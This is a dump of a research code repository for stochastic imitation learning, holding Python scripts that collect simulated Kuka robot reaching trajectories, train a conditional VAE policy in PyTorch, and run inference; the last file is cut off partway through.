msieb1/stochastic-IL | https://github.com/msieb1/stochastic-IL | e8cfc3aedaa56b03d88b216a8eb7a9a31515c22a | 1750a2e97b47b1b322b147410a7c5552f95eba06 | 225622d8189295eef9e350e0cd250ae3029544df | refs/heads/master | 2020-04-01T18:13:53.094405 | 2018-10-18T14:48:56 | 2018-10-18T14:48:56 | 153,480,134 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5707070827484131,
"alphanum_fraction": 0.6025640964508057,
"avg_line_length": 35.771427154541016,
"blob_id": "b3d12be83dc063c95fc9c3a95005601c119a1b9b",
"content_id": "1460b6a1e279408147a1f68903ca982a3d648be5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5148,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 140,
"path": "/files/run_inference.py",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "#add parent dir to find package. Only needed for source code build, pip install doesn't need it.\nimport os, inspect\nfrom kukaGymEnvReach import KukaGymEnvReach as KukaGymEnv\nimport time\n\nfrom numpy import array\nimport numpy as np\nfrom copy import deepcopy as copy\nfrom numpy.random import uniform as uf\n\nfrom pdb import set_trace\nimport pickle\nfrom os.path import join\nfrom numpy import concatenate as cat\nimport argparse\nimport torch\nimport sys\n\nsys.path.append('../models')\nfrom networks import VAE\n\nnp.set_printoptions(precision=4)\n\nxlow = 0.4\nxhigh = 0.7\nylow = -0.2\nyhigh = 0.2\nzlow = 0.3\nzhigh = 0.6\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--task', dest='task', type=str, default='reach')\nparser.add_argument(\"--batch_size\", type=int, default=16)\nparser.add_argument(\"--learning_rate\", type=float, default=0.001)\nparser.add_argument(\"--encoder_layer_sizes\", type=list, default=[3, 256])\nparser.add_argument(\"--decoder_layer_sizes\", type=list, default=[256, 3])\nparser.add_argument(\"--latent_size\", type=int, default=10)\nparser.add_argument('-e', '--expname', type=str, required=True)\n\nargs = parser.parse_args()\n\nEXP_PATH = '../experiments/{}'.format(args.expname)\nSAVE_PATH = join(EXP_PATH, 'data')\nMODEL_PATH = join(EXP_PATH, 'trained_weights')\n\nUSE_CUDA = True\nEPOCH=23\nmodel = VAE(encoder_layer_sizes=args.encoder_layer_sizes, latent_size=args.latent_size, decoder_layer_sizes=args.decoder_layer_sizes, conditional=True, num_labels=6)\nmodel.load_state_dict(torch.load(join(MODEL_PATH, 'epoch_{}.pk'.format(EPOCH)), map_location=lambda storage, loc: storage))\nif USE_CUDA:\n model = model.cuda()\n\ndef normalize(a):\n return a/np.linalg.norm(a)\n\ndef save_trajectory(file, savepath, seqname=None):\n if seqname is not None:\n seqname = seqname\n else:\n # If there's no video directory, this is the first sequence.\n if not os.listdir(savepath):\n seqname = '0'\n else:\n # Otherwise, get the latest sequence name and increment it.\n seq_names = [int(i.split('.')[0]) for i in os.listdir(savepath)]\n latest_seq = sorted(map(int, seq_names), reverse=True)[0]\n seqname = str(latest_seq+1)\n print('No seqname specified, using: %s' % seqname)\n with open(join(savepath, '{0:05d}_{1}}.pkl'.format(int(seqname), args.runname)), 'wb') as f:\n pickle.dump(file, f)\n\n\ndef main():\n env = KukaGymEnv(renders=True,isDiscrete=False, maxSteps = 10000000)\n motorsIds=[]\n\n all_trajectories = []\n n = 0\n while True:\n done = False\n # Reset z to 0,2 higher than intended because it adds +0.2 internally (possibly finger?)\n start = np.array([uf(xlow+0.05, xhigh-0.05), uf(ylow+0.05, yhigh-0.07), uf(zlow+0.05,zhigh-0.05)])\n goal = np.array([uf(xlow+0.05, xhigh-0.05), uf(ylow+0.05, yhigh-0.07), uf(zlow+0.05,zhigh-0.05)])\n state, success = np.array(env._reset_positions(start)) #default [-0.100000,0.000000,0.070000]\n action = normalize(goal - state[:3])*0.001\n eps = 0.01\n action = action.tolist()\n action += [0,0]\n if not success:\n env._reset()\n continue\n # print('diff goal - start: {}'.format(goal - state[:3]))\n # print('start state: {}, goal state: {}'.format(state[:3], goal))\n # print('true state: {}'.format(env._get_link_state()[0]))\n\n # print('normed action: {}'.format((goal - state[:3])/np.linalg.norm(state[:3]- goal)))\n # print('action: {}'.format(action[:3]))\n ii = 0\n\n trajectory = {'action': [], 'state_aug': [], 'next_state_aug': []}\n while (not done):\n action[:3] = normalize(goal - state[:3])*0.005\n\n state_old = 
copy(state)\n state_old_aug = cat([state[:3], goal])\n\n cur_state = torch.Tensor(state_old_aug).cuda()\n action = model.inference(n=1, k=cur_state.unsqueeze_(0)) \n\n # reshape, detach data, move to cpu, and convert to numpy \n action = action.view(-1,).detach().cpu().numpy() / 100 # * 100 during training for normalizing\n action = cat([action, np.zeros(2,)])\n state, reward, done, info = env.step2(action)\n state = np.array(state)\n obs = env.getExtendedObservation()\n if ii % 1 == 0:\n # # print('normed executed action: {}'.format((state[:3] - state_old[:3])/np.linalg.norm(state[:3] - state_old[:3])))\n # # print('executed action:{}'.format(state[:3] - state_old[:3]))\n print(\"\\n\")\n print('current state: {}'.format(state[:3]))\n print('goal state: {}'.format(goal))\n print('action: {}'.format(action[:3]))\n # pass\n ii += 1\n\n time.sleep(0.01)\n # set_trace()\n trajectory['action'].append(action)\n trajectory['state_aug'].append(state_old_aug)\n trajectory['next_state_aug'].append(cat([state[:3], goal]))\n if np.linalg.norm(goal - state[:3]) < eps:\n done = True\n if ii > 200:\n break\n\n\nif __name__==\"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.4900497496128082,
"alphanum_fraction": 0.5292654633522034,
"avg_line_length": 39.922157287597656,
"blob_id": "52178f3b4b4a20da0e3733a9f563f7b1beeb2659",
"content_id": "564edc0de048491884ef7e644e27052df8a52801",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6834,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 167,
"path": "/files/collect_data_multimodal.py",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "#add parent dir to find package. Only needed for source code build, pip install doesn't need it.\nimport os, inspect\nfrom kukaGymEnvReach import KukaGymEnvReach as KukaGymEnv\nimport time\n\nfrom numpy import array\nimport numpy as np\nfrom copy import deepcopy as copy\nfrom numpy.random import uniform as uf\n\nfrom pdb import set_trace\nimport pickle\nfrom os.path import join\nfrom numpy import concatenate as cat\nimport argparse\nimport matplotlib.pyplot as plt\nnp.set_printoptions(precision=4)\n\nxlow = 0.4\nxhigh = 0.7\nylow = -0.2\nyhigh = 0.2\nzlow = 0.3\nzhigh = 0.6\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-e', '--expname', type=str, required=True)\nparser.add_argument('-r', '--runname', type=str, required=True)\nargs = parser.parse_args()\n\nBASE_DIR = '/'.join(os.path.realpath(__file__).split('/')[:-3])\nEXP_PATH = join(BASE_DIR, 'experiments/{}'.format(args.expname))\nSAVE_PATH = join(EXP_PATH, 'data')\nMODEL_PATH = join(EXP_PATH, 'trained_weights')\n\nif not os.path.exists(SAVE_PATH):\n os.makedirs(SAVE_PATH)\n\ndef normalize(a):\n return a/np.linalg.norm(a)\n\ndef save_trajectory(file, savepath, seqname=None):\n if seqname is not None:\n seqname = seqname\n else:\n # If there's no video directory, this is the first sequence.\n if not os.listdir(savepath):\n seqname = '0'\n else:\n # Otherwise, get the latest sequence name and increment it.\n seq_names = [int(i.split('.')[0][:5]) for i in os.listdir(savepath)]\n latest_seq = sorted(map(int, seq_names), reverse=True)[0]\n seqname = str(latest_seq+1)\n print('No seqname specified, using: %s' % seqname)\n with open(join(savepath, '{0:05d}_{1}.pkl'.format(int(seqname), args.runname)), 'wb') as f:\n pickle.dump(file, f)\n\ndef main():\n env = KukaGymEnv(renders=True,isDiscrete=False, maxSteps = 10000000)\n \n try: \n motorsIds=[]\n #motorsIds.append(env._p.addUserDebugParameter(\"posX\",0.4,0.75,0.537))\n #motorsIds.append(env._p.addUserDebugParameter(\"posY\",-.22,.3,0.0))\n #motorsIds.append(env._p.addUserDebugParameter(\"posZ\",0.1,1,0.2))\n #motorsIds.append(env._p.addUserDebugParameter(\"yaw\",-3.14,3.14,0))\n #motorsIds.append(env._p.addUserDebugParameter(\"fingerAngle\",0,0.3,.3))\n \n dv = 0.00\n all_trajectories = []\n n = 0\n while True:\n done = False\n # Reset z to 0,2 higher than intended because it adds +0.2 internally (possibly finger?)\n # start = np.array([uf(xlow+0.03, xhigh-0.03), uf(ylow+0.03, yhigh-0.03), uf(zlow+0.03,zhigh-0.03)])\n # goal = np.array([uf(xlow+0.03, xhigh-0.03), uf(ylow+0.03, yhigh-0.03), uf(zlow+0.03,zhigh-0.03)])\n\n # start = np.array([uf(xlow+0.03, xlow+0.034), uf(ylow+0.1, ylow+0.15), uf(zlow+0.03,zlow+0.035)])\n start = np.array([xlow+0.032, uf(ylow+0.1, ylow+0.15), uf(zlow+0.03,zlow+0.035)])\n if start[1] < ylow+0.125:\n y_offset = -uf(0.08,0.12)\n else:\n y_offset = uf(0.08,0.12)\n goal = np.array([start[0]+ 0.15, start[1], start[2]-0.2])\n # switching_point_fraction = 1/uf(3.5,4.5)\n switching_point_fraction = 0.25\n state_, success = np.array(env._reset_positions(start)) #default [-0.100000,0.000000,0.070000]\n state = state_[:3]\n true_start_state = copy(state)\n action = normalize(goal - state)*0.001\n eps = 0.01\n action = action.tolist()\n action += [0,0]\n if not success:\n env._reset()\n continue\n # print('diff goal - start: {}'.format(goal - state))\n # print('start state: {}, goal state: {}'.format(state, goal))\n # print('true state: {}'.format(env._get_link_state()[0]))\n\n # print('normed action: {}'.format((goal - state)/np.linalg.norm(state- 
goal)))\n # print('action: {}'.format(action[:3]))\n ii = 0\n\n trajectory = {'action': [], 'state_aug': [], 'next_state_aug': []}\n while (not done):\n # print('state x: {}'.format(state[0]))\n if state[0] < true_start_state[0] + (goal[0] - true_start_state[0]) * switching_point_fraction:\n wp_goal = copy(goal)\n wp_goal[0] = true_start_state[0] +(true_start_state[0]+goal[0])/4.0\n elif state[0] < true_start_state[0] + (goal[0] - true_start_state[0]) * 2.0/3.0:\n # print('branched off')\n\n wp_goal = copy(goal)\n wp_goal[0] = true_start_state[0] + (goal[0] - true_start_state[0]) * 2.0/3.0\n wp_goal[1] = true_start_state[1] + y_offset\n \n else:\n # print('branch back in')\n wp_goal = copy(goal)\n \n action[:3] = normalize(wp_goal - state)*0.005\n\n state_old = copy(state)\n state_old_aug = cat([state, goal])\n state_, reward, done, info = env.step2(action)\n state = state_[:3]\n state = np.array(state)\n #obs = env.getExtendedObservation()\n if ii % 1 == 0:\n # print('normed executed action: {}'.format((state - state_old[:3])/np.linalg.norm(state - state_old[:3])))\n # print('executed action:{}'.format(state - state_old[:3]))\n # print(\"\\n\")\n print('current state: {}'.format(state))\n print('goal state: {}'.format(goal))\n print('action: {}'.format(action[:3]))\n pass\n ii += 1\n\n time.sleep(0.01)\n # set_trace()\n trajectory['action'].append(action)\n trajectory['state_aug'].append(state_old_aug)\n trajectory['next_state_aug'].append(cat([state, goal]))\n if np.linalg.norm(goal - state) < eps:\n done = True\n if ii >= 1000:\n break\n if done:\n all_trajectories.append(trajectory)\n\n if n % 10 == 0:\n print(\"collected {} trajectories\".format(n+1))\n\n if n % 50 == 0:\n print(\"save trajectories\")\n save_trajectory(all_trajectories, SAVE_PATH, 'newest_backup')\n if n % 50 == 0:\n print(\"save trajectories\")\n save_trajectory(all_trajectories, SAVE_PATH, 'newest')\n n += 1\n except KeyboardInterrupt:\n pass\n # save_trajectory(all_trajectories, SAVE_PATH)\n\nif __name__==\"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5699442028999329,
"alphanum_fraction": 0.6009235978126526,
"avg_line_length": 38.07518768310547,
"blob_id": "66131b128db861fb6cb82b0aba0a95b1242d3cb6",
"content_id": "2e45e11b1f39853511a2f79822dd36825d62b949",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5197,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 133,
"path": "/files/run_inference_multimodal.py",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "#add parent dir to find package. Only needed for source code build, pip install doesn't need it.\nimport os, inspect\nfrom kukaGymEnvReach import KukaGymEnvReach as KukaGymEnv\nimport time\n\nfrom numpy import array\nimport numpy as np\nfrom copy import deepcopy as copy\nfrom numpy.random import uniform as uf\n\nfrom pdb import set_trace\nimport pickle\nfrom os.path import join\nfrom numpy import concatenate as cat\nimport argparse\nimport torch\nimport sys\nBASE_DIR = '/'.join(os.path.realpath(__file__).split('/')[:-2])\nsys.path.append(join(BASE_DIR, 'models'))\nfrom networks import VAE\n\nnp.set_printoptions(precision=4)\n\nxlow = 0.4\nxhigh = 0.7\nylow = -0.2\nyhigh = 0.2\nzlow = 0.3\nzhigh = 0.6\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--task', dest='task', type=str, default='reach')\nparser.add_argument(\"--batch_size\", type=int, default=16)\nparser.add_argument(\"--learning_rate\", type=float, default=0.001)\nparser.add_argument(\"--encoder_layer_sizes\", type=list, default=[3, 128,256])\nparser.add_argument(\"--decoder_layer_sizes\", type=list, default=[256,128, 3])\nparser.add_argument(\"--latent_size\", type=int, default=30)\nparser.add_argument('-c', \"--ckpt_epoch_num\", type=int, default=31)\nparser.add_argument(\"-cu\", \"--cuda_visible_devices\",type=str, default=\"1,2\")\nparser.add_argument('-e', '--expname', type=str, required=True)\n\nargs = parser.parse_args()\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=args.cuda_visible_devices\n\nEXP_PATH = join(BASE_DIR, 'experiments/{}'.format(args.expname))\nSAVE_PATH = join(EXP_PATH, 'data')\nMODEL_PATH = join(EXP_PATH, 'trained_weights')\n\nUSE_CUDA = True\nEPOCH=args.ckpt_epoch_num\nmodel = VAE(encoder_layer_sizes=args.encoder_layer_sizes, latent_size=args.latent_size, decoder_layer_sizes=args.decoder_layer_sizes, conditional=True, num_labels=6)\nmodel.load_state_dict(torch.load(join(MODEL_PATH, 'epoch_{}.pk'.format(EPOCH)), map_location=lambda storage, loc: storage))\n\nif USE_CUDA:\n model = model.cuda()\ndef normalize(a):\n return a/np.linalg.norm(a)\n\ndef main():\n env = KukaGymEnv(renders=True,isDiscrete=False, maxSteps = 10000000)\n motorsIds=[]\n\n all_trajectories = []\n n = 0\n while True:\n done = False\n # Reset z to 0,2 higher than intended because it adds +0.2 internally (possibly finger?)\n start = np.array([uf(xlow+0.03, xlow+0.034), uf(ylow+0.1, ylow+0.15), uf(zlow+0.03,zlow+0.035)])\n goal = np.array([start[0]+ 0.15, start[1], start[2]-0.2])\n state_, success = np.array(env._reset_positions(start)) #default [-0.100000,0.000000,0.070000]\n state = state_[:3]\n\n action = normalize(goal - state)*0.001\n eps = 0.01\n action = action.tolist()\n action += [0,0]\n if not success:\n env._reset()\n continue\n # print('diff goal - start: {}'.format(goal - state))\n # print('start state: {}, goal state: {}'.format(state, goal))\n # print('true state: {}'.format(env._get_link_state()[0]))\n\n # print('normed action: {}'.format((goal - state)/np.linalg.norm(state- goal)))\n # print('action: {}'.format(action[:3]))\n ii = 0\n\n trajectory = {'action': [], 'state_aug': [], 'next_state_aug': []}\n while (not done):\n action[:3] = normalize(goal - state)*0.005\n\n state_old = copy(state)\n state_old_aug = cat([state, goal])\n\n cur_state = torch.Tensor(state_old_aug).cuda().unsqueeze_(0)\n action = model.inference(n=1, k=cur_state) \n action = action.view(-1,).detach().cpu().numpy() / 100 # * 100 during training for normalizing\n # 
reshape, detach data, move to cpu, and convert to numpy \n action = cat([action, np.zeros(2,)])\n state_, reward, done, info = env.step2(action)\n state = np.array(state)\n state = state_[:3]\n #obs = env.getExtendedObservation()\n if ii % 10 == 0:\n # # print('normed executed action: {}'.format((state - state_old[:3])/np.linalg.norm(state - state_old[:3])))\n # # print('executed action:{}'.format(state - state_old[:3]))\n samples = []\n for s in range(100):\n action = model.inference(n=1, k=cur_state) \n action = action.view(-1,).detach().cpu().numpy() / 100 # * 100 during training for normalizing\n samples.append(action)\n print(\"variance in action selection: {}\".format(np.std(samples, axis=0)))\n print(\"\\n\")\n print('current state: {}'.format(state))\n print('goal state: {}'.format(goal))\n print('action: {}'.format(action[:3]))\n # pass\n ii += 1\n\n time.sleep(0.01)\n # set_trace()\n trajectory['action'].append(action)\n trajectory['state_aug'].append(state_old_aug)\n trajectory['next_state_aug'].append(cat([state, goal]))\n if np.linalg.norm(goal - state) < eps:\n done = True\n if ii > 200:\n break\n\nif __name__==\"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5751549601554871,
"alphanum_fraction": 0.5829029083251953,
"avg_line_length": 32.956138610839844,
"blob_id": "3913fd68e6b44fb6a0a9c779d5871bd5b5182be8",
"content_id": "b69efb33a43e1496441e482d56fe5157a593dc73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3872,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 114,
"path": "/models/networks.py",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "import time\nimport argparse\nimport sys\nimport numpy as np\nimport os\nfrom PIL import Image\nfrom pdb import set_trace\nimport torch\nimport torch.nn as nn\n\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152\nos.environ[\"CUDA_VISIBLE_DEVICES\"]= \"1,2\"\n\n\ndef to_var(x, device, volatile=False):\n x = torch.Tensor(x)\n x = x.to(device)\n return x\n\nclass VAE(nn.Module):\n\n def __init__(self, encoder_layer_sizes, latent_size, decoder_layer_sizes, conditional=False, num_labels=0):\n super(VAE, self).__init__()\n if conditional:\n assert num_labels > 0\n assert type(encoder_layer_sizes) == list\n assert type(latent_size) == int\n assert type(decoder_layer_sizes) == list\n\n self.latent_size = latent_size\n self.encoder = Encoder(encoder_layer_sizes, latent_size, conditional, num_labels)\n self.decoder = Decoder(decoder_layer_sizes, latent_size, conditional, num_labels)\n\n def forward(self, x, k=None):\n batch_size = x.size(0)\n means, log_var = self.encoder(x, k)\n std = torch.exp(0.5 * log_var).cuda()\n # eps = to_var(torch.randn([batch_size, self.latent_size]))\n eps = torch.randn([batch_size, self.latent_size]).cuda()\n z = eps * std + means\n recon_x = self.decoder(z, k)\n return recon_x, means, log_var, z\n\n def inference(self, use_cuda=True, n=1, k=None):\n batch_size = n\n # z = to_var(torch.randn([batch_size, self.latent_size]))\n if use_cuda:\n z = torch.randn([batch_size, self.latent_size]).cuda()\n else:\n z = torch.randn([batch_size, self.latent_size])\n recon_x = self.decoder(z, k)\n return recon_x\n\nclass Encoder(nn.Module):\n\n def __init__(self, layer_sizes, latent_size, conditional, num_labels):\n super(Encoder, self).__init__()\n\n self.conditional = conditional\n if self.conditional:\n layer_sizes[0] += num_labels\n\n self.MLP = nn.Sequential()\n for i, (in_size, out_size) in enumerate( zip(layer_sizes[:-1], layer_sizes[1:]) ):\n self.MLP.add_module(name=\"L%i\"%(i), module=nn.Linear(in_size, out_size))\n self.MLP.add_module(name=\"A%i\"%(i), module=nn.ReLU())\n\n self.linear_means = nn.Linear(layer_sizes[-1], latent_size)\n self.linear_log_var = nn.Linear(layer_sizes[-1], latent_size)\n\n def forward(self, x, k=None):\n if self.conditional:\n # c = idx2onehot(c, n=10)\n \n x = torch.cat((x, k), dim=1)\n\n x = self.MLP(x)\n means = self.linear_means(x)\n log_vars = self.linear_log_var(x)\n return means, log_vars\n\nclass Decoder(nn.Module):\n\n def __init__(self, layer_sizes, latent_size, conditional, num_labels):\n super(Decoder, self).__init__()\n\n self.MLP = nn.Sequential()\n self.conditional = conditional\n if self.conditional:\n input_size = latent_size + num_labels\n else:\n input_size = latent_size\n\n for i, (in_size, out_size) in enumerate( zip([input_size]+layer_sizes[:-1], layer_sizes)):\n self.MLP.add_module(name=\"L%i\"%(i), module=nn.Linear(in_size, out_size))\n if i+1 < len(layer_sizes):\n self.MLP.add_module(name=\"A%i\"%(i), module=nn.ReLU())\n else:\n # self.MLP.add_module(name=\"sigmoid\", module=nn.Sigmoid())\n self.MLP.add_module(name=\"tanh\", module=nn.Tanh())\n\n def forward(self, z, k):\n if self.conditional:\n # c = idx2onehot(c, n=10)\n z = torch.cat((z, k), dim=1)\n\n x = self.MLP(z)\n return x\n\ndef vae_loss_fn(recon_x, x, mean, log_var):\n BCE = torch.nn.functional.binary_cross_entropy(recon_x, x, size_average=False)\n KLD = -0.5 * torch.sum(1 + log_var - mean.pow(2) - log_var.exp())\n return BCE + KLD\n\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 15,
"blob_id": "939a50cfcf7ea6d82691edf680fcc8baf9401f7f",
"content_id": "9ef5e25d62fc889121ddf7fe1d80dafde137b19a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 16,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 1,
"path": "/README.md",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "# stochastic-IL\n"
},
{
"alpha_fraction": 0.5905143618583679,
"alphanum_fraction": 0.6060454249382019,
"avg_line_length": 34.64285659790039,
"blob_id": "20c0800c3939a95276bcc5f0a1c6e272e50eedbb",
"content_id": "cf52d9ed674596dc7267df2bb8b0cc3f2ea852cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5988,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 168,
"path": "/models/train.py",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "import os\nimport time\nimport torch\nimport argparse\nimport numpy as np\nimport pandas as pd\n# import seaborn as sns\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom torchvision import transforms\nfrom torchvision.datasets import MNIST\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom collections import OrderedDict, defaultdict\nfrom os.path import join\nimport os\nimport pickle\nimport random\nfrom ipdb import set_trace\nfrom networks import VAE\nimport argparse\nfrom os.path import join\nimport matplotlib.pyplot as plt\nfrom copy import deepcopy as copy\nfrom logger import Logger\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--epochs\", type=int, default=40)\nparser.add_argument(\"--batch_size\", type=int, default=32)\nparser.add_argument(\"--learning_rate\", type=float, default=0.001)\nparser.add_argument(\"--encoder_layer_sizes\", type=list, default=[3, 128,256])\nparser.add_argument(\"--decoder_layer_sizes\", type=list, default=[256, 128, 3])\nparser.add_argument(\"--latent_size\", type=int, default=30)\nparser.add_argument(\"--print_every\", type=int, default=100)\nparser.add_argument(\"--fig_root\", type=str, default='figs')\nparser.add_argument(\"--conditional\",type=bool, default=True)\nparser.add_argument(\"-cu\", \"--cuda_visible_devices\",type=str, default=\"1,2\")\nparser.add_argument('-e', '--expname', type=str, required=True)\nargs = parser.parse_args()\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=args.cuda_visible_devices\n\nBASE_DIR = '/'.join(os.path.realpath(__file__).split('/')[:-2])\nEXP_PATH = join(BASE_DIR, 'experiments/{}'.format(args.expname))\nSAVE_PATH = join(EXP_PATH, 'data')\nMODEL_PATH = join(EXP_PATH, 'trained_weights')\nif not os.path.exists(MODEL_PATH):\n os.makedirs(MODEL_PATH)\nLOG_PATH = join('tb', args.expname)\nif not os.path.exists(LOG_PATH):\n os.makedirs(LOG_PATH)\n\nPKL_FILES = [i for i in os.listdir(SAVE_PATH) if i.startswith('newest')]\n\nUSE_CUDA = True\n\ndef to_var(x, use_cuda=True, volatile=False):\n x = torch.Tensor(x)\n if use_cuda:\n x = x.cuda()\n return x\n\ndef main():\n\n ts = time.time()\n\n datasets = OrderedDict()\n\n train_set_x = []\n train_trajectories = []\n train_set_y = []\n val_set_x = []\n val_set_y = []\n for file in PKL_FILES:\n with open(join(SAVE_PATH, file), 'rb') as f:\n loaded_trajectory = pickle.load(f) \n for state_tuple in loaded_trajectory: \n train_set_x.extend(state_tuple['action'])\n train_set_y.extend(state_tuple['state_aug'])\n print len(train_set_x)\n \n num_val = int(len(train_set_x) * 0.2)\n num_train = len(train_set_x) - num_val\n val_set_x = train_set_x[num_train : ]\n val_set_y = train_set_y[num_train : ]\n train_set_x = train_set_x[: num_train]\n train_set_y = train_set_y[: num_train]\n\n # Visualize trajectories in 2d:\n fig = plt.figure()\n # ax = fig.add_subplot(111, projection='3d') \n ind = np.random.choice(len(train_set_y), min(len(train_set_y), 5000), replace=False) \n for ii, pt in enumerate(np.array(train_set_y)[ind]):\n plt.scatter(pt[0], pt[1], s=0.2,c='b')\n plt.savefig(os.path.join(EXP_PATH, '{}_traj_plot.pdf'.format(args.expname)))\n # plt.show()\n # set_trace()\n # return\n\n datasets['train'] = TensorDataset(torch.Tensor(train_set_x), torch.Tensor(train_set_y))\n datasets['val'] = TensorDataset(torch.Tensor(val_set_x), torch.Tensor(val_set_y))\n logger = Logger(LOG_PATH)\n\n def loss_fn(recon_x, x, mean, log_var):\n #BCE = 
torch.nn.functional.binary_cross_entropy(recon_x, x, size_average=False)\n BCE = criterion(recon_x, x)\n KLD = -0.5 * torch.sum(1 + log_var - mean.pow(2) - log_var.exp())\n\n return BCE + KLD\n criterion = torch.nn.MSELoss()\n vae = VAE(\n encoder_layer_sizes=args.encoder_layer_sizes,\n latent_size=args.latent_size,\n decoder_layer_sizes=args.decoder_layer_sizes,\n conditional=args.conditional,\n num_labels= 6 if args.conditional else 0\n )\n if USE_CUDA:\n vae = vae.cuda()\n\n optimizer = torch.optim.SGD(vae.parameters(), lr=args.learning_rate, momentum=0.9)\n tot_iteration = 0\n for epoch in range(args.epochs):\n\n tracker_epoch = defaultdict(lambda: defaultdict(dict))\n print('-'*10)\n print(\"Epoch: {}\".format(epoch + 1))\n for split, dataset in datasets.items():\n if split == 'val':\n print('validation:')\n data_loader = DataLoader(dataset=dataset, batch_size=args.batch_size, shuffle=split=='train')\n for iteration, (x, y) in enumerate(data_loader):\n\n # set_trace()\n x = to_var(x)[:, :3] * 100\n y = to_var(y)\n\n x = x.view(-1, 3)\n y = y.view(-1, 6)\n\n if args.conditional:\n recon_x, mean, log_var, z = vae(x, y)\n else:\n recon_x, mean, log_var, z = vae(x)\n\n loss = loss_fn(recon_x, x, mean, log_var)\n\n if split == 'train':\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if tot_iteration % 100 == 0:\n logger.scalar_summary('train_loss', loss.data.item(), tot_iteration)\n else:\n if tot_iteration % 100 == 0:\n logger.scalar_summary('val_loss', loss.data.item(), tot_iteration)\n\n if iteration % args.print_every == 100 or iteration == len(data_loader)-1:\n print(\"Batch {0:04d}/{1} Loss {2:9.4f}\".format(iteration, len(data_loader)-1, loss.data.item()))\n tot_iteration += 1\n\n if epoch and epoch % 5 == 0:\n torch.save(vae.state_dict(), join(MODEL_PATH, 'epoch_{}.pk'.format(epoch)))\n print(\"saving weights...\")\n\nif __name__ == '__main__':\n\n main()\n"
},
{
"alpha_fraction": 0.616797924041748,
"alphanum_fraction": 0.6543508768081665,
"avg_line_length": 32.693878173828125,
"blob_id": "2ea2d5ca474b778901b197dae4775e904b2c00bb",
"content_id": "6a19a595c6a59b59cfd778a0b4b9e68eae3122f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4953,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 147,
"path": "/files/collect_data.py",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "#add parent dir to find package. Only needed for source code build, pip install doesn't need it.\nimport os, inspect\nfrom kukaGymEnvReach import KukaGymEnvReach as KukaGymEnv\nimport time\n\nfrom numpy import array\nimport numpy as np\nfrom copy import deepcopy as copy\nfrom numpy.random import uniform as uf\n\nfrom pdb import set_trace\nimport pickle\nfrom os.path import join\nfrom numpy import concatenate as cat\nimport argparse\nimport matplotlib.pyplot as plt\nnp.set_printoptions(precision=4)\n\nxlow = 0.4\nxhigh = 0.7\nylow = -0.2\nyhigh = 0.2\nzlow = 0.3\nzhigh = 0.6\n\n# SAVE_PATH = '/home/msieb/projects/CVAE/data'\n\n# parser = argparse.ArgumentParser()\n# parser.add_argument('-r', '--runname', type=str, required=True)\n# args = parser.parse_args()\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-e', '--expname', type=str, required=True)\nparser.add_argument('-r', '--runname', type=str, required=True)\nargs = parser.parse_args()\n\nEXP_PATH = '../experiments/{}'.format(args.expname)\nSAVE_PATH = join(EXP_PATH, 'data')\nMODEL_PATH = join(EXP_PATH, 'trained_weights')\n\nif not os.path.exists(SAVE_PATH):\n os.makedirs(SAVE_PATH)\n\ndef normalize(a):\n\treturn a/np.linalg.norm(a)\n\ndef save_trajectory(file, savepath, seqname=None):\n\tif seqname is not None:\n\t\tseqname = seqname\n\telse:\n\t # If there's no video directory, this is the first sequence.\n\t if not os.listdir(savepath):\n\t seqname = '0'\n\t else:\n\t # Otherwise, get the latest sequence name and increment it.\n\t seq_names = [int(i.split('.')[0]) for i in os.listdir(savepath)]\n\t latest_seq = sorted(map(int, seq_names), reverse=True)[0]\n\t seqname = str(latest_seq+1)\n\t print('No seqname specified, using: %s' % seqname)\n\twith open(join(savepath, '{0:05d}_{1}.pkl'.format(int(seqname), args.runname)), 'wb') as f:\n\t\tpickle.dump(file, f)\n\n\ndef main():\n\tenv = KukaGymEnv(renders=False,isDiscrete=False, maxSteps = 10000000)\n\t\t\n\ttry: 